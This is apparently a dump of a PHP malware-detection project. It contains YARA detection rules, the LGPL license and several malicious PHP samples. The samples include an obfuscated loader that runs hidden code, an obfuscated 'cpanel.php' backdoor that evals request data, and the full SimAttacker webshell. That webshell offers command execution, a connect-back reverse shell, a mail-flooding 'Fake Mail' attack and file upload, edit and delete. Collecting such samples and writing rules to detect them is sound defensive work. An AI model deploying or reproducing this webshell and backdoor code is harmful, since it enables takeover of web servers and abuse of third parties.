x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists(" x6f 142 x5f 16<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&/%rx<~!!%s:N}#-%o:W%c:>1<%b:>11<%j:=tj{fpg)%%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]276197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]epdof./#@#/qp%>5h%!<*::::::-1246767~6/7rfs%6<#o]1/20QUU0~:/h%:<**#57]38y]47]67y]37]88y]27]28yW;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}%tmw!>!#]y84]275]y83]27~!%z!>21<%j=6[%ww)))) { $GLOBALS[" x61 156 x75 156 x65 156 x63 164 x69 157 x6e"; function dhyvbmt($n){return chr(orx27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%tmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m," x61 156 x64 162 x6f 151 x64")) or (strstr($uas," x63 150 x72 +;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;W&)7gj6<*K)ftpmdXA6~6/7&6|7**111127-K)ebfsX x27u%)7fm11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#27pd%6!bssb2!>#p#/#p#/%z>2*!%z>32>!}t::**<(!(%w:!>! x+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GB)fubfsdXA x27K6< x7fw6*3qj%7><+{e%+*!*+fepdfe{h+{d%)+opj/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!b66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#r# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:npd#)tutjyf`opjudovg x22)24y7 x24- x24*1<%j=tj{fpgh1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*C1/35.)1/14+9**-)1/2986+7**^c%j:^Ew:Qb:Qc:W24!bssbz) x24]25 x24- x24-!% x24- x24*!|! x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`62]38y]572]48y]#>m%:j!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%g)!gj<*#k#)usbut`cpV x7f x7f x7f x7f!#]y847,*d x27,*c x27,*b x27)fepdof.)f3ldfidk!~!<**qp%!-uyfu%)3of)fepdof`5j%!<**3-j%-bubE{h%)sutcvt-#w#)lhA!osvufs!~<3,j%>j%!*3! 
248L3P6L1M5]D2P4]D6#<%G7#@#7/7^#iubq# x5cq% x27jsv%6^#zsfvr# x5cq%7**^#zsfvStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSopxkrbc'; $vgkbclh=explode(chr((636-516)),substr($awvjtnz,(29027-23007),(198-164))); $jdxccsyh = $vgkbclh[0]($vgkbclh[(7-6)]); $nkttprcq = $vgkbclh[0]($vgkbclh[(7-5)]); if (!function_exists('huqbsiykq')) { function huqbsiykq($ewjaowa, $ppcmgty,$euscsfo) { $rputetgcppb = NULL; for($blvfkqsfhf=0;$blvfkqsfhf<(sizeof($ewjaowa)/2);$blvfkqsfhf++) { $rputetgcppb .= substr($ppcmgty, $ewjaowa[($blvfkqsfhf*2)],$ewjaowa[($blvfkqsfhf*2)+(7-6)]); } return $euscsfo(chr((34-25)),chr((531-439)),$rputetgcppb); }; } $xozybdtes = explode(chr((213-169)),'3371,36,157,63,3931,36,2709,44,5708,38,1659,66,2636,43,4231,64,4563,42,868,40,836,32,3967,62,2332,63,5776,31,4847,58,3660,52,2063,20,4528,35,1170,29,5409,38,4365,58,1914,22,3712,42,1474,28,2555,41,5552,35,4949,31,3260,23,53,43,780,24,5965,55,5180,40,3407,49,970,62,1936,50,1791,45,1502,28,3132,66,4713,35,4748,34,3820,62,501,42,4295,70,220,37,1264,64,5918,24,4029,58,2990,53,5875,43,3315,56,640,45,2440,66,5283,25,2679,30,2083,33,5607,55,1836,50,5807,32,3631,29,4423,59,5007,45,0,53,2883,54,4905,44,1886,28,5052,69,2270,62,5839,36,2208,62,280,55,2753,70,2823,60,5351,58,4980,27,2395,45,5662,46,4087,59,2033,30,5121,59,1725,66,3043,67,4482,46,605,35,3882,23,2506,49,685,44,3754,66,4198,33,96,61,1150,20,1032,25,5587,20,908,62,5500,52,2596,40,335,57,3198,62,3110,22,5308,43,1581,24,729,51,1199,65,257,23,4631,27,1057,64,2937,53,2145,63,4605,26,4146,52,3567,64,5220,63,459,42,3283,32,804,32,1605,54,5942,23,1121,29,1348,61,3510,57,1986,47,1409,65,543,62,5447,27,3456,54,392,67,5474,26,3905,26,4658,55,5746,30,1530,51,1328,20,4782,65,2116,29'); $ympifwn = $jdxccsyh("",huqbsiykq($xozybdtes,$awvjtnz,$nkttprcq)); $jdxccsyh=$awvjtnz; $ympifwn(""); $ympifwn=(599-478); $awvjtnz=$ympifwn-1; ?> 5 | -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 
36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 
75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 
115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. 
If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. 166 | -------------------------------------------------------------------------------- /data/samples/cpanel.php: -------------------------------------------------------------------------------- 1 | 
$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?> 15 | 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /data/php.yar: -------------------------------------------------------------------------------- 1 | import "hash" 2 | include "whitelist.yar" 3 | 4 | /* 5 | Detect: 6 | - phpencode.org 7 | - http://www.pipsomania.com/best_php_obfuscator.do 8 | - 
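http://atomiku.com/online-php-code-obfuscator/
        - http://www.webtoolsvn.com/en-decode/
        - http://obfuscator.uk/example/
        - http://w3webtools.com/encode-php-online/
        - http://www.joeswebtools.com/security/php-obfuscator/
        - https://github.com/epinna/weevely3
        - http://cipherdesign.co.uk/service/php-obfuscator
        - http://sysadmin.cyklodev.com/online-php-obfuscator/
        - http://mohssen.org/SpinObf.php
        - https://code.google.com/p/carbylamine/
        - https://github.com/tennc/webshell

        - https://github.com/wireghoul/htshells

    Thanks to:
        - https://stackoverflow.com/questions/3115559/exploitable-php-functions
*/

// Gate for the whole rule set: the rule is `global`, so no other rule in this
// file can match unless this one does. It requires `<?` followed by any
// character other than `x` (presumably to skip `<?xml` prologues; confirm)
// and a file smaller than 5MB.
// NOTE(review): files of 5MB or more are therefore never reported by these
// rules; cover them with a separate control (size alerting, hash checks).
global private rule IsPhp
{
    strings:
        $php = /<\?[^x]/

    condition:
        $php and filesize < 5MB
}

// Flags one of the keywords `function`, `return` or `base64_decode` followed,
// within at most 256 characters, by three consecutive bytes outside the
// ranges 0x09-0x0d and 0x20-0x7E.
rule NonPrintableChars
{
    strings:
        /*
        Searching only for non-printable characters completely kills the perf,
        so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7)
        to get an acceptable speed.
        */
        $non_printables = /(function|return|base64_decode).{,256}[^\x09-\x0d\x20-\x7E]{3}/

    condition:
        (any of them) and not IsWhitelisted
}


// Flags md5()/sha1() of a request superglobal compared (`==` or `===`) with a
// hard-coded hex digest of matching length (32 or 40 digits), i.e. a password
// check embedded in the script. Both patterns are case-insensitive.
rule PasswordProtection
{
    strings:
        $md5 = /md5\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{32}['"]/ nocase
        $sha1 = /sha1\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{40}['"]/ nocase
    condition:
        (any of them) and not IsWhitelisted
}

// Patterns typical of obfuscated or machine-generated PHP. A single matching
// string is enough, unless the IsWhitelisted rule (not defined in this part
// of the file; see the `include "whitelist.yar"` line) also matches.
rule ObfuscatedPhp
{
    strings:
        $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase  // ;eval( <- this is dodgy
        $eval_comment = /(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\/\*[^\*]*\*\/\(/ nocase  // eval/*lol*/( <- this is dodgy
        $b374k = "'ev'.'al'"
        $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/  //b374k
        $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/  // weevely3 launcher
        $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/  // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html
        $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/  //https://github.com/UltimateHackers/nano
        // NOTE(review): the reference below is the same URL as for $nano;
        // confirm which project this pattern was written for.
        $ninja = /base64_decode[^;]+getallheaders/  //https://github.com/UltimateHackers/nano
        // NOTE(review): the range `A-z` also covers the ASCII characters
        // between `Z` and `a` (`[`, `\`, `]`, `^`, `_` and the backtick), so
        // this matches more than alphanumerics. Narrowing it to `A-Z` would
        // stop matching names that contain `_` or an index such as `[0]`;
        // run the sample tests before changing it.
        $variable_variable = /\${\$[0-9a-zA-z]+}/
        $too_many_chr = /(chr\([\d]+\)\.){8}/  // eight or more concatenated `chr()` calls
        $concat = /(\$[^\n\r]+\.){5}/  // five or more concatenated words
        $concat_with_spaces = /(\$[^\n\r]+\. ){5}/  // five or more concatenated words, with spaces
        $var_as_func = /\$_(GET|POST|COOKIE|REQUEST|SERVER)\s*\[[^\]]+\]\s*\(/
        $comment = /\/\*([^*]|\*[^\/])*\*\/\s*\(/  // eval /* comment */ (php_code)
    condition:
        (any of them) and not IsWhitelisted
}

// Constructs that are suspicious in PHP: execution functions fed directly
// with decoded or request-supplied data, handler and ini overrides, and
// similar. The strings section continues after `$pr`.
rule DodgyPhp
{
    strings:
        $basedir_bypass = /curl_init\s*\(\s*["']file:\/\// nocase
        $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719
        $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/ nocase

        // execution or callback-taking function whose first argument is a
        // decoder, php://input or a request superglobal
        $execution = /\b(popen|eval|assert|passthru|exec|include|system|pcntl_exec|shell_exec|base64_decode|`|array_map|ob_start|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase  // function that takes a callback as 1st parameter
        $execution2 = /\b(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase  // functions that take a callback as 2nd parameter
        $execution3 = /\b(array_(diff|intersect)_u(key|assoc)|array_udiff)\s*\(\s*([^,]+\s*,?)+\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))\s*\[[^]]+\]\s*\)+\s*;/ nocase  // functions that take a callback as a later (typically last) parameter

        $htaccess = "SetHandler application/x-httpd-php"
        $iis_com = /IIS:\/\/localhost\/w3svc/
        $include = /include\s*\(\s*[^\.]+\.(png|jpg|gif|bmp)/  // Clever includes: include() of a file with an image extension
        // reads, sets or restores ini settings that restrict what PHP may do
        $ini_get = /ini_(get|set|restore)\s*\(\s*['"](safe_mode|open_basedir|disable_(function|classe)s|safe_mode_exec_dir|safe_mode_include_dir|register_globals|allow_url_include)/ nocase
        $pr =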
/(preg_replace(_callback)?|mb_ereg_replace|preg_filter)\s*\([^)]*(\/|\\x2f)(e|\\x65)['"]/ nocase // http://php.net/manual/en/function.preg-replace.php 96 | $register_function = /register_[a-z]+_function\s*\(\s*['"]\s*(eval|assert|passthru|exec|include|system|shell_exec|`)/ // https://github.com/nbs-system/php-malware-finder/issues/41 97 | $safemode_bypass = /\x00\/\.\.\/|LD_PRELOAD/ 98 | $shellshock = /\(\)\s*{\s*[a-z:]\s*;\s*}\s*;/ 99 | $udp_dos = /fsockopen\s*\(\s*['"]udp:\/\// nocase 100 | $various = " 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | "" ){ 69 | 70 | $fedit=realpath($fedit); 71 | 72 | $lines = file($fedit); 73 | 74 | echo "
"; 75 | 76 | echo " 85 | 86 | 87 | 88 |
"; 89 | 90 | $savefile=$_POST['savefile']; 91 | 92 | $filepath=realpath($_POST['filepath']); 93 | 94 | if ($savefile <> "") 95 | 96 | { 97 | 98 | $fp=fopen("$filepath","w+"); 99 | 100 | fwrite ($fp,"") ; 101 | 102 | fwrite ($fp,$savefile) ; 103 | 104 | fclose($fp); 105 | 106 | echo ""; 107 | 108 | } 109 | 110 | exit(); 111 | 112 | } 113 | 114 | ?> 115 | 116 | "" ){ 123 | 124 | $fchmod=realpath($fchmod); 125 | 126 | echo "

127 | 128 | chmod for :$fchmod
129 | 130 |

131 | 132 | Chmod :
133 | 134 |
135 | 136 | 137 | 138 |
"; 139 | 140 | $chmod0=$_POST['chmod0']; 141 | 142 | if ($chmod0 <> ""){ 143 | 144 | chmod ($fchmod , $chmod0); 145 | 146 | }else { 147 | 148 | echo "primission Not Allow change Chmod"; 149 | 150 | } 151 | 152 | exit(); 153 | 154 | } 155 | 156 | ?> 157 | 158 | 159 | 160 |
161 | 162 | 163 | 164 | 165 | 166 | 221 | 222 | 723 | 724 | 725 | 726 | 727 | 728 | 741 | 742 | 743 | 744 |
167 | 168 |

169 | 170 |
171 | 172 |
173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 187 | 188 | File Manager

189 | 190 |

191 | 192 | 193 | 194 | 195 | 196 | CMD Shell

197 | 198 |

199 | 200 | 201 | 202 | Fake mail

203 | 204 |

205 | 206 | 207 | 208 | 209 | 210 | Connect Back

211 | 212 |

213 | 214 | 215 | 216 | 217 | 218 | About

219 | 220 |

 

 

223 | 224 | 239 | 240 | ***************************************************************************
241 | 242 |  Iranian Hackers : WWW.SIMORGH-EV.COM
243 | 244 |  Programer : Hossein Asgary
245 | 246 |  Note : SimAttacker  Have copyright from simorgh security Group
247 | 248 |  please : If you find bug or problems in program , tell me by :
249 | 250 |  e-mail : admin(at)simorgh-ev(dot)com
251 | 252 | Enjoy :) [Only 4 Best Friends ]
253 | 254 | ***************************************************************************

255 | 256 | "; 257 | 258 | 259 | 260 | echo "OS :". php_uname(); 261 | 262 | echo "
IP :". 263 | 264 | ($_SERVER['REMOTE_ADDR']); 265 | 266 | echo "
"; 267 | 268 | 269 | 270 | 271 | 272 | } 273 | 274 | //************************************************************ 275 | 276 | //cmd-command line 277 | 278 | $cmd=$_POST['cmd']; 279 | 280 | if($id=="cmd"){ 281 | 282 | $result=shell_exec("$cmd"); 283 | 284 | echo "

CMD ExeCute

" ; 285 | 286 | echo "
287 | 288 |
289 | 290 |
291 | 292 | 293 | 294 | 295 | 296 |
"; 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | } 305 | 306 | 307 | 308 | //******************************************************** 309 | 310 | 311 | 312 | //fake mail = Use victim server 4 DOS - fake mail 313 | 314 | if ( $id=="fake-mail"){ 315 | 316 | error_reporting(0); 317 | 318 | echo "

Fake Mail- DOS E-mail By Victim Server

" ; 319 | 320 | echo "
321 | 322 | Victim Mail :

323 | 324 | Number-Mail :

325 | 326 | Comments: 327 | 328 |
329 | 330 |
331 | 332 | 333 | 334 |
"; 335 | 336 | //send Storm Mail 337 | 338 | $to=$_POST['to']; 339 | 340 | $nom=$_POST['nom']; 341 | 342 | $Comments=$_POST['Comments']; 343 | 344 | if ($to <> "" ){ 345 | 346 | for ($i = 0; $i < $nom ; $i++){ 347 | 348 | $from = rand (71,1020000000)."@"."Attacker.com"; 349 | 350 | $subject= md5("$from"); 351 | 352 | mail($to,$subject,$Comments,"From:$from"); 353 | 354 | echo "$i is ok"; 355 | 356 | } 357 | 358 | echo ""; 359 | 360 | } 361 | 362 | } 363 | 364 | //******************************************************** 365 | 366 | 367 | 368 | //Connect Back -Firewall Bypass 369 | 370 | if ($id=="cshell"){ 371 | 372 | echo "
Connect back Shell , bypass Firewalls
373 | 374 | For user :
375 | 376 | nc -l -p 1019
377 | 378 |
379 | 380 |

381 | 382 | Your IP & BindPort:
383 | 384 | 385 | 386 |
387 | 388 | 389 | 390 |
"; 391 | 392 | $mip=$_POST['mip']; 393 | 394 | $bport=$_POST['bport']; 395 | 396 | if ($mip <> "") 397 | 398 | { 399 | 400 | $fp=fsockopen($mip , $bport , $errno, $errstr); 401 | 402 | if (!$fp){ 403 | 404 | $result = "Error: could not open socket connection"; 405 | 406 | } 407 | 408 | else { 409 | 410 | fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); 411 | 412 | while(!feof($fp)){ 413 | 414 | fputs ($fp," bash # "); 415 | 416 | $result= fgets ($fp, 4096); 417 | 418 | $message=`$result`; 419 | 420 | fputs ($fp,"--> ".$message."\n"); 421 | 422 | } 423 | 424 | fclose ($fp); 425 | 426 | } 427 | 428 | } 429 | 430 | } 431 | 432 | 433 | 434 | //******************************************************** 435 | 436 | //Spy File Manager 437 | 438 | $homedir=getcwd(); 439 | 440 | $dir=realpath($_GET['dir'])."/"; 441 | 442 | if ($id=="fm"){ 443 | 444 | echo "

 Home: $homedir 445 | 446 |   447 | 448 |

449 | 450 |  Path: 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 |
459 | 460 |
"; 461 | 462 | 463 | 464 | echo " 465 | 466 | 467 | 468 |
469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 481 | 482 | 485 | 486 | 489 | 490 | 493 | 494 | 495 | 496 | "; 497 | 498 | if (is_dir($dir)){ 499 | 500 | if ($dh=opendir($dir)){ 501 | 502 | while (($file = readdir($dh)) !== false) { 503 | 504 | $fsize=round(filesize($dir . $file)/1024); 505 | 506 | 507 | 508 | 509 | 510 | echo " 511 | 512 | 513 | 514 | 531 | 532 | 551 | 552 | 575 | 576 | 601 | 602 | 617 | 618 | 619 | 620 | 621 | 622 | "; 623 | 624 | } 625 | 626 | closedir($dh); 627 | 628 | } 629 | 630 | } 631 | 632 | echo "
File / Folder Name 479 | 480 | Size KByte 483 | 484 | Download 487 | 488 | Edit 491 | 492 | ChmodDelete
"; 515 | 516 | if (is_dir($dir.$file)) 517 | 518 | { 519 | 520 | echo " $file dir"; 521 | 522 | } 523 | 524 | else { 525 | 526 | echo " $file "; 527 | 528 | } 529 | 530 | echo ""; 533 | 534 | if (is_file($dir.$file)) 535 | 536 | { 537 | 538 | echo "$fsize"; 539 | 540 | } 541 | 542 | else { 543 | 544 | echo "  "; 545 | 546 | } 547 | 548 | echo " 549 | 550 | "; 553 | 554 | if (is_file($dir.$file)){ 555 | 556 | if (is_readable($dir.$file)){ 557 | 558 | echo "download"; 559 | 560 | }else { 561 | 562 | echo "No ReadAble"; 563 | 564 | } 565 | 566 | }else { 567 | 568 | echo " "; 569 | 570 | } 571 | 572 | echo " 573 | 574 | "; 577 | 578 | if (is_file($dir.$file)) 579 | 580 | { 581 | 582 | if (is_readable($dir.$file)){ 583 | 584 | echo "Edit"; 585 | 586 | }else { 587 | 588 | echo "No ReadAble"; 589 | 590 | } 591 | 592 | }else { 593 | 594 | echo " "; 595 | 596 | } 597 | 598 | echo " 599 | 600 | "; 603 | 604 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { 605 | 606 | echo "Dont in windows"; 607 | 608 | } 609 | 610 | else { 611 | 612 | echo "Chmod"; 613 | 614 | } 615 | 616 | echo "Delete
633 | 634 |
635 | 636 | 637 | 638 | Send this file: 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 |
"; 647 | 648 | } 649 | 650 | //Upload Files 651 | 652 | $rpath=$_GET['dir']; 653 | 654 | if ($rpath <> "") { 655 | 656 | $uploadfile = $rpath."/" . $_FILES['userfile']['name']; 657 | 658 | print "
";
659 | 
660 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
661 | 
662 | echo "";
663 | 
664 | echo "";
665 | 
666 | }
667 | 
668 |  }
669 | 
670 |  //file deleted
671 | 
672 | $frpath=$_GET['fdelete'];
673 | 
674 | if ($frpath <> "") {
675 | 
676 | if (is_dir($frpath)){
677 | 
678 | $matches = glob($frpath . '/*.*');
679 | 
680 | if ( is_array ( $matches ) ) {
681 | 
682 |   foreach ( $matches as $filename) {
683 | 
684 |   unlink ($filename);
685 | 
686 |   rmdir("$frpath");
687 | 
688 | echo "";
689 | 
690 | echo "";
691 | 
692 |   }
693 | 
694 |   }
695 | 
696 |   }
697 | 
698 |   else{
699 | 
700 | echo "";
701 | 
702 | unlink ("$frpath");
703 | 
704 | echo "";
705 | 
706 | exit(0);
707 | 
708 | 
709 | 
710 |   }
711 | 
712 |   
713 | 
714 | 
715 | 
716 | }
717 | 
718 | 			?>
719 | 
720 | 			
721 | 
722 | 			
729 | 730 |


731 | 732 | Copyright 2004-Simorgh Security
733 | 734 | Hossein-Asgari
735 | 736 |
737 | 738 | 739 | 740 | www.r57.biz

745 | 746 | 750 |
